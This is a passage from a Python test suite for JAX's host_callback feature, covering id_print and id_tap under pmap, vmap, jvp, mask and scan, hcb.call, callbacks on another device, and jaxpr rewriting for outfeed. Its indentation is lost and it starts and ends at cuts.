[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jvp_pmap_vmap(self):
    # A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = api.local_device_count()
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.jvp(api.pmap(api.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[0, :, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
testing_stream.reset()
def test_vmap_pmap(self):
    # A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = api.local_device_count()
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.vmap(api.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = api.local_device_count()
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if api.device_count() == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert api.device_count() == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
testing_stream.reset()
def test_cond_pmap(self):
raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
# A matrix M[ij] = i * 10 + j
nr_devices = api.local_device_count()
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, api.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
testing_stream.reset()
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_mask(self):
@partial(api.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
api.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] )
( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
api.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4]
[0. 0.2 0.4 0.6 0.8] )
( ( False )
( False ) ) ) )""", testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., api.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
def test_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what="x times i", output_stream=testing_stream)
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait()
expected = """
what: x times i
[[0. 1. 2.]
[3. 4. 5.]]
what: x times i
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times i
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 0,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
api.grad(loss)(1.0) # should not fail
def test_remat(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, api.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_named_call(self):
if not config.omnistaging_enabled:
raise SkipTest("Test requires omnistaging")
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
testing_stream.reset()
testing_stream.test_method_name = self._testMethodName
super().setUp()
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(args):
x, y = args
return x * y
def fun(x, use_outside=True):
return 2 * (hcb.call(f_outside, (x, x + 1),
result_shape=x)
if use_outside else f_outside((x, x + 1)))
res_inside = fun(2, use_outside=False)
self.assertAllClose(res_inside, fun(2, use_outside=True))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, loop(1.2, use_outside=True))
def test_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = api.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=api.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function"""
def fun(m):
      return jnp.sin(hcb.call(lambda x: np.cos(x),
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun, m)
def fun(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
testing_stream.reset()
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(api.device_count(), dtype=jnp.int32)
res = api.pmap(fun)(xv)
self.assertAllClose(api.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
testing_stream.reset()
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError, "Batching rule for 'outside_call' not implemented"):
api.vmap(fun)(np.ones((2, 3)))
def test_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return api.jit(jax_outside_fun)(api.device_put(arg, device))
@api.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=api.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = api.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
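  # A minimal usage sketch (illustrative only; the CallJaxTest class below
  # exercises the same pattern, including grad):
  #   outside_cpu = api.devices("cpu")[0]
  #   y = call_jax_other_device(jnp.sin, 3., device=outside_cpu)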
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() != "cpu":
assert api.devices("cpu")
self.outside_device = api.devices("cpu")[0]
else:
if len(api.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = api.devices("cpu")[1]
super().setUp()
def test_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), api.jit(f_outside)(3.))
def test_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {api.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = api.grad(f_jax)(3.)
self.assertAllClose(res_jax, api.grad(f_outside)(3.))
def test_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = api.grad(f_jax)(x)
self.assertAllClose(res_jax, api.grad(f_outside)(x))
def test_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = api.grad(api.grad(f_jax))(5.)
res_outside = api.grad(api.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = api.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
# Since it is somewhat annoying to update the Jaxpr assertions when we change
# the Jaxpr printing, we do not check these by default. It is recommended that
# before making changes to the code generation and Jaxpr rewriting, turn on
# the checking, update the expected Jaxpr, and then make the changes.
# assertMultiLineStrippedEqual(self, expected, str(rewritten))
del rewritten
def test_no_outfeed(self):
self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] b d
g = id e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c e
h = id f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] 42 b
e = id c
in (a,) }""", lambda: hcb.id_print(42), [],
has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
def f(x):
hcb.id_print(x, what="x")
hcb.id_print(x + 1, what="x + 1")
return 2
self.assertRewrite("""
{ lambda ; a c d.
let _ e = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print what='x') ] a c
f = id d
b = add a 1
_ g = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print what='x + 1') ] b e
h = id f
in (2, g, h) }""", f, [1])
def test_cond(self):
y = jnp.ones(5) # captured const
def func(x, z):
return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
z, lambda a: (hcb.id_print(a), y))
self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] d f
i = id g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
ct_body = jnp.ones(5, np.float32) # captured const for the body
ct_cond = jnp.ones(5, np.float32) # captured const for the conditional
def func(x):
# x: f32[5]
# c: (f32[5], f32)
return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
(x, np.float32(1.)))
self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c f
i = id g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
"""A while with outfeed in the pred."""
ct_body = jnp.ones(5) # captured const for the body
ct_cond = jnp.ones(2) # captured const for the conditional
def func(x):
return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
lambda c: (ct_body, hcb.id_print(c[1]) + 1),
(x, 1))
self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a g
j = id h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] c f
i = id g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a g
j = id h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
y = jnp.ones(5) # captured const
def func(x):
return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)
self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i = id_tap[ arg_treedef_=PyTreeDef(tuple, [*,*])
has_token_=True
tap_func_=_print ] b c g
j = id h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x)
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot)
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((5,), 0.7)
self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
let e j k = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print ] a d
g = id e
c = mul a b
in (c, f, g) }
num_consts=0 ] c h i
f = add a e
g = mul c 3.00
in (f, *, j, k, 0.00, g) }
length=5
linear=(False, True, False, False, False, True)
num_carry=4
num_consts=0
reverse=False
unroll=1 ] 0.00 * d e a *
_ _ h i _ c =
scan[ jaxpr={ lambda ; a b g h c d.
let e = mul b d
f i = id_tap[ arg_treedef_=*
has_token_=True
tap_func_=_print
transforms=(('transpose',),) ] e g
j = id h
in (*, b, i, j, *, f) }
length=5
linear=(True, True, False, False, True, False)
num_carry=4
num_consts=0
reverse=True
unroll=1 ] * 1.00 f g * b
in (c, h, i) }""", api.grad(g), [arg])
def test_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x)
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b),
f.defvjp(f_fwd, f_bwd)
